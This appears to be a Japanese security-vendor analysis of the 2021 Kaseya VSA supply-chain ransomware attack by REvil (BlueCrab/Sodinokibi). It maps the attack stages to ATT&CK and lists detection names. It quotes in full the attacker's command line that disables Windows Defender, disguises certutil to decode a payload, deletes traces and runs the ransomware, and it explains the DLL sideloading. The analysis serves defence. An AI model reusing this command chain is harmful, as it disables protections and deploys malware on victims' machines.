MSP(Managed Service Provider)および企業管理ソリューションの開発社である Kaseya のプログラム VSA(各種パッチ管理とクライアントのモニタリングを実行する cloud ベースのマネジメントサービス)の脆弱性を利用して配布されたランサムウェアは、韓国国内でも活発に拡散している BlueCrab(Sodinikibi)ランサムウェアであると確認された。以下の図は当該ランサムウェアに感染された場合のデスクトップの画面であり、韓国国内で活発に拡散している BlueCrab と同じであることがわかる。韓国国内で問題視されている BlueCrab が不特定多数の一般ユーザーをターゲットとして検索サイトの Google、Microsoft Bing を通じて JavaScript 形式(*.JS)で出回っているのとは異なり、今回の被害事例はターゲット型攻撃の形式で拡散しており、ランサムウェアの動作方式においても違いが確認された。
この攻撃の黒幕であると思われる REvil グループは、効果的な配布のためにサプライチェーンを通じて攻撃しており、感染プロセスにおいても Windows Defender の無力化およびアンチウイルス製品ベンダーの検知を回避するために正常な MS ファイルを利用してファイルの暗号化をするに至るまで用意周到に行っている。
詳細な感染の内訳は以下の通りである。
- Initial-Access: Supply Chain Compromise(TID: T1195)
Kaseya 社の VSA の脆弱性を利用して C:\kworking フォルダーに agent.crt ファイル(base64 エンコードファイル)を生成 - Execution: Command and Scripting Interpreter(TID: 1059)
Kaseya 社の AgentMon.exe により Powershell コマンドを実行 - Defence Evasion: Impair Defenses(TID: 1562) & Masquerading(TID: 1036) & Obfuscated Files or Information(TID: 1027) & Indicator Removal on Host(TID: 1070)
| “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe |
V3 製品ユーザーの場合、これらの Powershell コマンドを実行するとビヘイビア検知機能により Execution/MDP.Behavior.M3792 検知で事前の検出が可能であると確認された。詳細機能と説明は以下の通りである。
- DisableRealtimeMonitoring: Windows Defender のリアルタイムチェックを終了
- DisableIntrusionPreventionSystem: Windows Defender のダウンロードファイルチェックを無効化
- DisableScriptScanning: Windows Defender のスクリプトチェックを無効化
- EnableControlledFolderAccess Disabled: 制限されたフォルダーへのアクセスを許可
- EnableNetworkProtection AuditMode –Force: ネットワーク保護モードを無効化
- MAPSReporting Disabled: Microsoft Active Protection Service レポートを無効化
- SubmitSamplesConsent NeverSend: Windows Defender のサンプルの自動送信を無効化
- copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe: 正常な certutil.exe を windows パスに cert.exe でコピー
- echo %RANDOM% >> C:\Windows\cert.exe: コピーした cert.exe のファイル末尾にランダムのバイトを追加してアンチウイルスによる certutil.exe 実行検知を回避
- C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe: 脆弱性を利用して生成された難読化されたファイルを復号(agent.crt -> agent.exe)
- del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe: 難読化ファイルおよびコピーした certutil.exe を削除したあと、最終的に復号された exe ファイルを実行
- Persistence: Hijack Execution Flow(TID: 1574)
当該 exe ファイルは、実行すると %temp% パスに Microsoft の正常なファイル(msmpeng.exe)と BlueCrab の機能を持つ dll(mpsvc.dll)を同じパスに生成する。msmpeng.exe を実行すると mpsvc.dll の ServiceCrtMain を呼び出すが、攻撃者が生成した dll はその関数にランサムウェア機能を搭載しており、不正な行為はその dll をロードした正常な msmpeng.exe が実行するようになる。
正常なプロセスである msmpeng.exe の振る舞いにより、アンチウイルス製品ベンダーの検知を回避しようとしたものと思われる。V3 製品では、ファイル検知以外にも msmpeng.exe によるランサムウェア DLL モジュール(mpsvc.dll)が実行された時点で「プロセスのメモリチェック」機能により検知が可能である。それ以外に、MDS、EDR 製品においてもこのような動作方式の BlueCrab ランサムウェアを有効に検知することを確認している。
V3 による検知の現況
- Data/BIN.EncPe (2021.07.03.03)
- Ransomware/Win.Sodinokibi (2021.07.03.03)
- Ransomware/Win.REvil (2021.07.03.03)
- Execution/MDP.Behavior.M3792(ビヘイビア検知 2021.07.10.00)
- Ransomware/Win.BlueCrab.XM120(メモリ検知 2021.07.09.03)
[EDR 製品の検知画面]
[MDS 製品の検知画面]
*引用元(英文)
https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
https://www.fortinet.com/blog/threat-research/new-supply-chain-ransomware-attack-targets-kaseya-platform
https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack
Categories:マルウェアの情報